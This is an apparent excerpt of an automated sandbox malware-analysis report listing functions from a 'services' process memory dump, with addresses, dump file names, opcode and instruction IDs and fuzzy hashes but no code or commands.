                                                                • Instruction ID: a6df1feafaa4036b039e70637253679b61ece50ed7ae8046202eda5c92c66bd0
                                                                • Opcode Fuzzy Hash: a67dced4f8cfc80b41fc136c7db4153b1dd4e334a7d2a541aa105f8afb35b17a
                                                                • Instruction Fuzzy Hash: 3EE0123090C58E8FEB64EE04C0A5ABE3BB6FF05344F200428D51AC7281C639A942C780
                                                                Function 00007FF849994080 Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a39c889fe8115a2da6a7dcccb08329c1112a674e651e3e1a18641cb86807767e
                                                                • Instruction ID: d6521cf968703afc35585addda7845502c55f764269248cd83a23b3aa96f5137
                                                                • Opcode Fuzzy Hash: a39c889fe8115a2da6a7dcccb08329c1112a674e651e3e1a18641cb86807767e
                                                                • Instruction Fuzzy Hash: 46D04274618A8E8FDB94EE0DC895A5A77E1FB64700F504550A429C7266CA34FC51CB80
                                                                Function 00007FF848F4352F Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb868490b48c218367858b25517e8320400bb7977ba4b664d641b2a31d201c68
                                                                • Instruction ID: f77d2e7985dd815708e407c101b950399ae3b211ec1c7fe6d9ca0c826ced98a8
                                                                • Opcode Fuzzy Hash: cb868490b48c218367858b25517e8320400bb7977ba4b664d641b2a31d201c68
                                                                • Instruction Fuzzy Hash: 3CE0EC3090981D9FE771EB18CC943AAB671EF84311F1042F5800EA6299CE342E828B80
                                                                Function 00007FF849641DCB Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction ID: 72931cc1790d99224c5e4f434eed67fd09afa62bb4287d4d8285c09cd70baf7a
                                                                • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction Fuzzy Hash: 5AD0C954A0DAE78DF6797EC18560E3991A5AF21381E22403FC15F828C5CF1CB602AE09
                                                                Function 00007FF84964DEFB Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction ID: e1926ace84dd3d2ce5456bc6c4ddb1877b03452850d2c96ae1cb54ca92971bf1
                                                                • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction Fuzzy Hash: 8AD0CA60E1C5C39DF2BA7EC1827023EA9A19F56380EA0003ED09F428C2CF2CB801661A
                                                                Function 00007FF8496412DF Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction ID: b8cfd76fb99f24eb18868ca74db319859dde97d8735adb51971c360246ee01f2
                                                                • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction Fuzzy Hash: 7FC04C14E0D2D39FE6316AB4485193916911F17284B150972D11ACA2C7D95CB8546A95

                                                                Non-executed Functions

                                                                Function 00007FF849996398 Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 277acc98c63a14793f3f3410f1d77174e64074c62a8959c65a196864bde9dd7d
                                                                • Instruction ID: fc16a95de89d31b45b33f4167347b95637ad1b6745ec742ae0797fb7495fbfe9
                                                                • Opcode Fuzzy Hash: 277acc98c63a14793f3f3410f1d77174e64074c62a8959c65a196864bde9dd7d
                                                                • Instruction Fuzzy Hash: 86216A3184E3C24FD753AB7088285907FB0EF17254B0A42EBC095CB0E3EA5D185AD722
                                                                Function 00007FF848F409B0 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c9$!k9$"s9$#{9
                                                                • API String ID: 0-1692736845
                                                                • Opcode ID: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                • Instruction ID: 015c0e02d4608efab263b1d6b6206c7fb35a05466097148df057ca286b8f1b21
                                                                • Opcode Fuzzy Hash: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                • Instruction Fuzzy Hash: 78415B12A2B563A9E19237BDB4021FA6B64EF813BDF484777E04C9D0D34F1D609682ED
                                                                Function 00007FF84988B10E Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3406849623.00007FF849880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849880000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: +$0$0${
                                                                • API String ID: 0-1355733333
                                                                • Opcode ID: 4e428f83e170e536d6dc07bcb1db22424f95fff2285e79789e7b88738190a634
                                                                • Instruction ID: a52d19d74774e89d5a4fa892e41e02c9327c84e3a9371cf95d625c09399f76ff
                                                                • Opcode Fuzzy Hash: 4e428f83e170e536d6dc07bcb1db22424f95fff2285e79789e7b88738190a634
                                                                • Instruction Fuzzy Hash: 89111C70E08299CFEB64DF45C894BB8B7F2EF54345F1085BAC01AA7284CB795986CF50